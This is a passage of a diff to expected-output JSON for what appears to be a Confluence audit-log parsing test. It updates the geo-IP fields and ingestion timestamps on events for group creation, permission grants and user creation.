operation\",\"to\":\"UPDATE_USER_ATTRIBUTE\"},{\"i18nKey\":\"Allowed operation\",\"key\":\"Allowed operation\",\"to\":\"UPDATE_GROUP\"},{\"i18nKey\":\"Allowed operation\",\"key\":\"Allowed operation\",\"to\":\"DELETE_ROLE\"},{\"i18nKey\":\"Allowed operation\",\"key\":\"Allowed operation\",\"to\":\"DELETE_GROUP\"},{\"i18nKey\":\"Allowed operation\",\"key\":\"Allowed operation\",\"to\":\"UPDATE_USER\"},{\"i18nKey\":\"Allowed operation\",\"key\":\"Allowed operation\",\"to\":\"DELETE_USER\"},{\"i18nKey\":\"Allowed operation\",\"key\":\"Allowed operation\",\"to\":\"UPDATE_GROUP_ATTRIBUTE\"},{\"i18nKey\":\"Allowed operation\",\"key\":\"Allowed operation\",\"to\":\"CREATE_ROLE\"},{\"i18nKey\":\"Allowed operation\",\"key\":\"Allowed operation\",\"to\":\"CREATE_USER\"},{\"i18nKey\":\"Allowed operation\",\"key\":\"Allowed operation\",\"to\":\"UPDATE_ROLE_ATTRIBUTE\"},{\"i18nKey\":\"Allowed operation\",\"key\":\"Allowed operation\",\"to\":\"UPDATE_ROLE\"},{\"i18nKey\":\"Allowed operation\",\"key\":\"Allowed operation\",\"to\":\"CREATE_GROUP\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624601,\"nano\":440000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -402,31 +378,6 @@ } } }, - "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "Oxfordshire", - "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" - } - }, - "address": "81.2.69.143", - "ip": "81.2.69.143" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2021-11-22T23:43:21.536Z", "ecs": { "version": "1.12.0" @@ -442,9 +393,25 @@ "service": { "address": "http://confluence.internal:8090" }, + "source": { + "geo": { + "continent_name": "Europe", + "region_iso_code": "GB-ENG", + "city_name": "London", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "England", + "location": { + "lon": -0.0931, + "lat": 51.5142 + } + }, + "address": "81.2.69.143", + "ip": "81.2.69.143" + }, "event": { "action": "audit.logging.summary.group.created", - "ingested": "2021-12-08T15:09:09.045131539Z", + "ingested": "2021-12-14T14:34:52.859152310Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"}],\"auditType\":{\"action\":\"Group created\",\"actionI18nKey\":\"audit.logging.summary.group.created\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Users and groups\",\"categoryI18nKey\":\"audit.logging.category.user.management\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624601,\"nano\":536000000},\"version\":\"1.0\"}", "type": [ "group", @@ -459,6 +426,9 @@ "full_name": "Anonymous", "id": "-2" }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "confluence-administrators", "id": "confluence-administrators" @@ -485,31 +455,6 @@ } } }, - "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "Oxfordshire", - "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" - } - }, - "address": "81.2.69.143", - "ip": "81.2.69.143" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2021-11-22T23:43:21.552Z", "ecs": { "version": "1.12.0" @@ -525,9 +470,25 @@ "service": { "address": "http://confluence.internal:8090" }, + "source": { + "geo": { + "continent_name": "Europe", + "region_iso_code": "GB-ENG", + "city_name": "London", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "England", + "location": { + "lon": -0.0931, + "lat": 51.5142 + } + }, + "address": "81.2.69.143", + "ip": "81.2.69.143" + }, "event": { "action": "audit.logging.summary.group.created", - "ingested": "2021-12-08T15:09:09.045133245Z", + "ingested": "2021-12-14T14:34:52.859152663Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-users\",\"name\":\"confluence-users\",\"type\":\"Group\"}],\"auditType\":{\"action\":\"Group created\",\"actionI18nKey\":\"audit.logging.summary.group.created\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Users and groups\",\"categoryI18nKey\":\"audit.logging.category.user.management\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624601,\"nano\":552000000},\"version\":\"1.0\"}", "type": [ "group", @@ -542,6 +503,9 @@ "full_name": "Anonymous", "id": "-2" }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "confluence-users", "id": "confluence-users" @@ -598,20 +562,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -619,7 +577,7 @@ }, "event": { "action": "audit.logging.summary.global.permission.added", - "ingested": "2021-12-08T15:09:09.045134925Z", + "ingested": "2021-12-14T14:34:52.859153019Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"}],\"auditType\":{\"action\":\"Global permission added\",\"actionI18nKey\":\"audit.logging.summary.global.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-administrators\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"USECONFLUENCE\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624601,\"nano\":592000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -690,20 +648,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -711,7 +663,7 @@ }, "event": { "action": "audit.logging.summary.global.permission.added", - "ingested": "2021-12-08T15:09:09.045136626Z", + "ingested": "2021-12-14T14:34:52.859153414Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-users\",\"name\":\"confluence-users\",\"type\":\"Group\"}],\"auditType\":{\"action\":\"Global permission added\",\"actionI18nKey\":\"audit.logging.summary.global.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-users\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"PERSONALSPACE\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624601,\"nano\":620000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -782,20 +734,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -803,7 +749,7 @@ }, "event": { "action": "audit.logging.summary.global.permission.added", - "ingested": "2021-12-08T15:09:09.045138330Z", + "ingested": "2021-12-14T14:34:52.859153863Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"}],\"auditType\":{\"action\":\"Global permission added\",\"actionI18nKey\":\"audit.logging.summary.global.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-administrators\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"ADMINISTRATECONFLUENCE\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624601,\"nano\":623000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -874,20 +820,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -895,7 +835,7 @@ }, "event": { "action": "audit.logging.summary.global.permission.added", - "ingested": "2021-12-08T15:09:09.045139987Z", + "ingested": "2021-12-14T14:34:52.859154224Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-users\",\"name\":\"confluence-users\",\"type\":\"Group\"}],\"auditType\":{\"action\":\"Global permission added\",\"actionI18nKey\":\"audit.logging.summary.global.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-users\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"USECONFLUENCE\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624601,\"nano\":627000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -966,20 +906,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -987,7 +921,7 @@ }, "event": { "action": "audit.logging.summary.global.permission.added", - "ingested": "2021-12-08T15:09:09.045141674Z", + "ingested": "2021-12-14T14:34:52.859154584Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"}],\"auditType\":{\"action\":\"Global permission added\",\"actionI18nKey\":\"audit.logging.summary.global.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-administrators\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"SYSTEMADMINISTRATOR\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624601,\"nano\":688000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -1058,20 +992,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -1079,7 +1007,7 @@ }, "event": { "action": "audit.logging.summary.global.permission.added", - "ingested": "2021-12-08T15:09:09.045143538Z", + "ingested": "2021-12-14T14:34:52.859155145Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"}],\"auditType\":{\"action\":\"Global permission added\",\"actionI18nKey\":\"audit.logging.summary.global.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-administrators\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"PERSONALSPACE\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624601,\"nano\":692000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -1150,20 +1078,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -1171,7 +1093,7 @@ }, "event": { "action": "audit.logging.summary.global.permission.added", - "ingested": "2021-12-08T15:09:09.045145231Z", + "ingested": "2021-12-14T14:34:52.859155524Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-users\",\"name\":\"confluence-users\",\"type\":\"Group\"}],\"auditType\":{\"action\":\"Global permission added\",\"actionI18nKey\":\"audit.logging.summary.global.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-users\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"CREATESPACE\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624601,\"nano\":694000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -1242,20 +1164,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -1263,7 +1179,7 @@ }, "event": { "action": "audit.logging.summary.global.permission.added", - "ingested": "2021-12-08T15:09:09.045146940Z", + "ingested": "2021-12-14T14:34:52.859155881Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"}],\"auditType\":{\"action\":\"Global permission added\",\"actionI18nKey\":\"audit.logging.summary.global.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-administrators\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"CREATESPACE\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624601,\"nano\":696000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -1347,20 +1263,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -1368,7 +1278,7 @@ }, "event": { "action": "audit.logging.summary.user.created", - "ingested": "2021-12-08T15:09:09.045148645Z", + "ingested": "2021-12-14T14:34:52.859156258Z", "original": "{\"affectedObjects\":[{\"id\":\"2c9580827d4a06e8017d4a07c3e10000\",\"name\":\"test.user\",\"type\":\"User\"}],\"auditType\":{\"action\":\"User created\",\"actionI18nKey\":\"audit.logging.summary.user.created\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Users and groups\",\"categoryI18nKey\":\"audit.logging.category.user.management\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Display name\",\"key\":\"Display name\",\"to\":\"test.user\"},{\"i18nKey\":\"Email\",\"key\":\"Email\",\"to\":\"test.user@example.com\"},{\"i18nKey\":\"Username\",\"key\":\"Username\",\"to\":\"admin\"},{\"i18nKey\":\"Active\",\"key\":\"Active\",\"to\":\"Yes\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":54000000},\"version\":\"1.0\"}", "type": [ "user", @@ -1443,20 +1353,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -1464,7 +1368,7 @@ }, "event": { "action": "audit.logging.summary.group.membership.added", - "ingested": "2021-12-08T15:09:09.045150340Z", + "ingested": "2021-12-14T14:34:52.859156645Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-users\",\"name\":\"confluence-users\",\"type\":\"Group\"},{\"id\":\"2c9580827d4a06e8017d4a07c3e10000\",\"name\":\"admin\",\"type\":\"User\"}],\"auditType\":{\"action\":\"User added to group\",\"actionI18nKey\":\"audit.logging.summary.group.membership.added\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Users and groups\",\"categoryI18nKey\":\"audit.logging.category.user.management\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":147000000},\"version\":\"1.0\"}", "type": [ "group", @@ -1538,20 +1442,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -1559,7 +1457,7 @@ }, "event": { "action": "audit.logging.summary.group.membership.added", - "ingested": "2021-12-08T15:09:09.045152065Z", + "ingested": "2021-12-14T14:34:52.859157144Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"},{\"id\":\"2c9580827d4a06e8017d4a07c3e10000\",\"name\":\"admin\",\"type\":\"User\"}],\"auditType\":{\"action\":\"User added to group\",\"actionI18nKey\":\"audit.logging.summary.group.membership.added\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Users and groups\",\"categoryI18nKey\":\"audit.logging.category.user.management\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":172000000},\"version\":\"1.0\"}", "type": [ "group", @@ -1647,20 +1545,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -1668,7 +1560,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:09:09.045153752Z", + "ingested": "2021-12-14T14:34:52.859157547Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-administrators\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"VIEWSPACE\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":401000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -1749,20 +1641,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -1770,7 +1656,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:09:09.045155444Z", + "ingested": "2021-12-14T14:34:52.859157911Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-users\",\"name\":\"confluence-users\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-users\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"VIEWSPACE\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":429000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -1845,20 +1731,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -1866,7 +1746,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:09:09.045157120Z", + "ingested": "2021-12-14T14:34:52.859158267Z", "original": "{\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"VIEWSPACE\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":437000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -1947,20 +1827,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -1968,7 +1842,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:09:09.045158823Z", + "ingested": "2021-12-14T14:34:52.859158629Z", "original": "{\"affectedObjects\":[{\"id\":\"confluence-administrators\",\"name\":\"confluence-administrators\",\"type\":\"Group\"},{\"id\":\"98305\",\"name\":\"Demonstration Space\",\"type\":\"Space\"}],\"auditType\":{\"action\":\"Space permission added\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"audit.logging.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"Group\",\"key\":\"Group\",\"to\":\"confluence-administrators\"},{\"i18nKey\":\"Type\",\"key\":\"Type\",\"to\":\"REMOVEOWNCONTENT\"},{\"i18nKey\":\"Space\",\"key\":\"Space\",\"to\":\"ds\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"timestamp\":{\"epochSecond\":1637624602,\"nano\":442000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -2049,20 +1923,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": 